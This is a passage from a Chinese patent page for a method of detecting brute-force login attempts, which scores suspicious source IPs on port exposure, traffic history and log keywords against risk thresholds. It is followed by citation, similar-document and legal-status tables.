若所述可疑源IP地址的外网特征为所述可疑源IP地址不存在外网访问端口,则所述可疑源IP地址的外网特征的维度风险等级为第一等级;
若所述可疑源IP地址的外网特征为所述可疑源IP地址存在外网访问端口,则所述可疑源IP地址的外网特征的维度风险等级为第二等级,所述第一等级小于所述第二等级。
5.如权利要求2所述的暴力破解检测方法,其特征在于,所述可疑源IP地址的维度特征包括流量特征;
所述确定所述可疑源IP地址的各个维度特征的维度风险等级的步骤包括:
若所述可疑源IP地址的流量特征为所述可疑源IP地址在预设时长内不存在被恶意流量攻击的行为,则所述可疑源IP地址的流量特征的维度风险等级为第一等级;
若所述可疑源IP地址的流量特征为所述可疑源IP地址在预设检测时长内存在被恶意流量攻击的行为,则所述可疑源IP地址的流量特征的维度风险等级为第二等级,所述第一等级小于所述第二等级。
6.如权利要求2所述的暴力破解检测方法,其特征在于,所述可疑源IP地址的维度特征包括关键字特征;
所述确定所述可疑源IP地址的各个维度特征的维度风险等级的步骤包括:
若所述可疑源IP地址的关键字特征为所述可疑源IP地址的日志信息中不包括预设关键字,则所述可疑源IP地址的关键字特征的维度风险等级为第一等级;
若所述可疑源IP地址的关键字特征为所述可疑源IP地址的日志信息中包括预设关键字,则所述可疑源IP地址的关键字特征的维度风险等级为第二等级,所述第一等级小于所述第二等级。
7.如权利要求2至6任一项所述的暴力破解检测方法,其特征在于,所述根据所述可疑源IP地址的各个维度特征的维度风险等级之和,确定所述可疑源IP地址的登录行为是否为暴力破解行为的步骤包括:
若所述可疑源IP地址的各个维度特征的维度风险等级之和大于或者等于第一预设等级阈值,确定所述可疑源IP地址的登录行为是高风险暴力破解行为;
若所述可疑源IP地址的各个维度特征的维度风险等级之和,大于第二预设等级阈值且小于所述第一预设等级阈值,确定所述可疑源IP地址的登录行为是中风险暴力破解行为,所述第一预设等级阈值大于第二预设等级阈值;
若所述可疑源IP地址的各个维度特征的维度风险等级之和小于或者等于所述第二预设等级阈值,确定所述可疑源IP地址的登录行为不是暴力破解行为;
所述确定所述可疑源IP地址的登录行为是否为暴力破解行为的步骤之后,还包括:
若确定所述可疑源IP地址的登录行为是高风险暴力破解行为,则执行告警操作。
8.一种暴力破解检测系统,其特征在于,所述暴力破解检测系统包括:
IP地址获取模块,用于获取预设时长内登录失败次数达到预设次数阈值的可疑源IP地址;
维度特征获取模块,用于获取所述可疑源IP地址的维度特征,所述维度特征至少包括两个;
行为确定模块,用于根据所述可疑源IP地址的维度特征确定所述可疑源IP地址的登录行为是否为暴力破解行为。
9.一种暴力破解检测设备,其特征在于,所述暴力破解检测设备包括:存储器、处理器及存储在所述存储器上并可在所述处理器上运行的暴力破解检测程序,所述暴力破解检测程序被所述处理器执行时实现如权利要求1至7中任一项所述的暴力破解检测方法的步骤。
10.一种计算机存储介质,其特征在于,所述计算机存储介质上存储有暴力破解检测程序,所述暴力破解检测程序被处理器执行时实现如权利要求1至7中任一项所述的暴力破解检测方法的步骤。
Priority Applications (1)
Application Number | Priority Date | Filing Date | Title |
---|---|---|---|
CN202011515111.8A CN112688930A (zh) | 2020-12-18 | 2020-12-18 | 暴力破解检测方法、系统、设备及介质 |
Applications Claiming Priority (1)
Application Number | Priority Date | Filing Date | Title |
---|---|---|---|
CN202011515111.8A CN112688930A (zh) | 2020-12-18 | 2020-12-18 | 暴力破解检测方法、系统、设备及介质 |
Publications (1)
Publication Number | Publication Date |
---|---|
CN112688930A true CN112688930A (zh) | 2021-04-20 |
Family
ID=75450775
Family Applications (1)
Application Number | Title | Priority Date | Filing Date |
---|---|---|---|
CN202011515111.8A Pending CN112688930A (zh) | 2020-12-18 | 2020-12-18 | 暴力破解检测方法、系统、设备及介质 |
Country Status (1)
Country | Link |
---|---|
CN (1) | CN112688930A (zh) |
Cited By (7)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
CN114124525A (zh) * | 2021-11-22 | 2022-03-01 | 秦皇岛泰和安科技有限公司 | 恶意ip封禁方法、装置、设备及计算机可读存储介质 |
CN114157499A (zh) * | 2021-12-07 | 2022-03-08 | 中信银行股份有限公司 | 一种基于ip价值评价的弹性安全防护方法及系统 |
CN114172831A (zh) * | 2021-12-03 | 2022-03-11 | 杭州安恒信息技术股份有限公司 | 暴力破解方法、系统、计算机及存储介质 |
CN115051820A (zh) * | 2022-03-01 | 2022-09-13 | 深圳开源互联网安全技术有限公司 | 一种多维度防暴力破解方法、装置、设备及可读存储介质 |
CN115118463A (zh) * | 2022-06-10 | 2022-09-27 | 深信服科技股份有限公司 | 一种失陷主机检测方法、装置、电子设备及存储介质 |
CN115189930A (zh) * | 2022-06-27 | 2022-10-14 | 珠海豹趣科技有限公司 | 一种防止账户爆破的方法、装置和电子设备 |
CN117857179A (zh) * | 2024-01-08 | 2024-04-09 | 北京方向标信息科技有限公司 | 一种ip暴力破解检测和防护的方法 |
Citations (7)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
CN106529288A (zh) * | 2016-11-16 | 2017-03-22 | 智者四海(北京)技术有限公司 | 一种帐号风险识别方法及装置 |
CN107465691A (zh) * | 2017-09-14 | 2017-12-12 | 西安电子科技大学 | 基于路由器日志分析的网络攻击检测系统及检测方法 |
CN110213199A (zh) * | 2018-02-28 | 2019-09-06 | 中国移动通信集团有限公司 | 一种撞库攻击监控方法、装置、系统及计算机存储介质 |
CN110611635A (zh) * | 2018-06-14 | 2019-12-24 | 蓝盾信息安全技术股份有限公司 | 一种基于多维度失陷账号的检测方法 |
CN110808994A (zh) * | 2019-11-11 | 2020-02-18 | 杭州安恒信息技术股份有限公司 | 暴力破解操作的检测方法、装置及服务器 |
CN111245839A (zh) * | 2020-01-13 | 2020-06-05 | 奇安信科技集团股份有限公司 | 防暴力破解方法及装置 |
WO2020248687A1 (zh) * | 2019-06-12 | 2020-12-17 | 深圳前海微众银行股份有限公司 | 一种预防恶意攻击的方法及装置 |
-
2020
- 2020-12-18 CN CN202011515111.8A patent/CN112688930A/zh active Pending
Patent Citations (7)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
CN106529288A (zh) * | 2016-11-16 | 2017-03-22 | 智者四海(北京)技术有限公司 | 一种帐号风险识别方法及装置 |
CN107465691A (zh) * | 2017-09-14 | 2017-12-12 | 西安电子科技大学 | 基于路由器日志分析的网络攻击检测系统及检测方法 |
CN110213199A (zh) * | 2018-02-28 | 2019-09-06 | 中国移动通信集团有限公司 | 一种撞库攻击监控方法、装置、系统及计算机存储介质 |
CN110611635A (zh) * | 2018-06-14 | 2019-12-24 | 蓝盾信息安全技术股份有限公司 | 一种基于多维度失陷账号的检测方法 |
WO2020248687A1 (zh) * | 2019-06-12 | 2020-12-17 | 深圳前海微众银行股份有限公司 | 一种预防恶意攻击的方法及装置 |
CN110808994A (zh) * | 2019-11-11 | 2020-02-18 | 杭州安恒信息技术股份有限公司 | 暴力破解操作的检测方法、装置及服务器 |
CN111245839A (zh) * | 2020-01-13 | 2020-06-05 | 奇安信科技集团股份有限公司 | 防暴力破解方法及装置 |
Cited By (9)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
CN114124525A (zh) * | 2021-11-22 | 2022-03-01 | 秦皇岛泰和安科技有限公司 | 恶意ip封禁方法、装置、设备及计算机可读存储介质 |
CN114172831A (zh) * | 2021-12-03 | 2022-03-11 | 杭州安恒信息技术股份有限公司 | 暴力破解方法、系统、计算机及存储介质 |
CN114172831B (zh) * | 2021-12-03 | 2024-05-28 | 杭州安恒信息技术股份有限公司 | 暴力破解方法、系统、计算机及存储介质 |
CN114157499A (zh) * | 2021-12-07 | 2022-03-08 | 中信银行股份有限公司 | 一种基于ip价值评价的弹性安全防护方法及系统 |
CN115051820A (zh) * | 2022-03-01 | 2022-09-13 | 深圳开源互联网安全技术有限公司 | 一种多维度防暴力破解方法、装置、设备及可读存储介质 |
CN115051820B (zh) * | 2022-03-01 | 2024-03-22 | 深圳开源互联网安全技术有限公司 | 一种多维度防暴力破解方法、装置、设备及可读存储介质 |
CN115118463A (zh) * | 2022-06-10 | 2022-09-27 | 深信服科技股份有限公司 | 一种失陷主机检测方法、装置、电子设备及存储介质 |
CN115189930A (zh) * | 2022-06-27 | 2022-10-14 | 珠海豹趣科技有限公司 | 一种防止账户爆破的方法、装置和电子设备 |
CN117857179A (zh) * | 2024-01-08 | 2024-04-09 | 北京方向标信息科技有限公司 | 一种ip暴力破解检测和防护的方法 |
Similar Documents
Publication | Publication Date | Title |
---|---|---|
CN112688930A (zh) | 暴力破解检测方法、系统、设备及介质 | |
CN107888607B (zh) | 一种网络威胁检测方法、装置及网络管理设备 | |
JP6894003B2 (ja) | Apt攻撃に対する防御 | |
JP6104149B2 (ja) | ログ分析装置及びログ分析方法及びログ分析プログラム | |
US9628508B2 (en) | Discovery of suspect IP addresses | |
CN104468632A (zh) | 防御漏洞攻击的方法、设备及系统 | |
US8458789B1 (en) | System, method and computer program product for identifying unwanted code associated with network communications | |
CN112351017B (zh) | 横向渗透防护方法、装置、设备及存储介质 | |
CN112788034B (zh) | 对抗网络攻击的处理方法、装置、电子设备和存储介质 | |
CA3078658A1 (en) | Systems and methods for automated intrusion detection | |
US8201255B1 (en) | Hygiene-based discovery of exploited portals | |
CN114301647B (zh) | 态势感知中漏洞信息的预测防御方法、装置及系统 | |
Sequeira | Intrusion prevention systems: security's silver bullet? | |
Yamada et al. | RAT-based malicious activities detection on enterprise internal networks | |
CN113626814A (zh) | 一种基于恶意攻击行为的Window系统应急响应方法 | |
Alnabulsi et al. | Protecting code injection attacks in intelligent transportation system | |
CN113055362B (zh) | 异常行为的预防方法、装置、设备及存储介质 | |
Tanakas et al. | A novel system for detecting and preventing SQL injection and cross-site-script | |
CN112671736B (zh) | 一种攻击流量确定方法、装置、设备及存储介质 | |
CN113660222A (zh) | 基于强制访问控制的态势感知防御方法及系统 | |
Kono et al. | An unknown malware detection using execution registry access | |
CN113079182A (zh) | 一种网络安全控制系统 | |
Rahmawati et al. | Web Application Firewall Using Proxy and Security Information and Event Management (SIEM) for OWASP Cyber Attack Detection | |
Wang | Design and research on the test of internal network penetration test | |
US12088618B2 (en) | Methods and systems for asset risk determination and utilization for threat mitigation |
Legal Events
Date | Code | Title | Description |
---|---|---|---|
PB01 | Publication | ||
PB01 | Publication | ||
SE01 | Entry into force of request for substantive examination | ||
SE01 | Entry into force of request for substantive examination |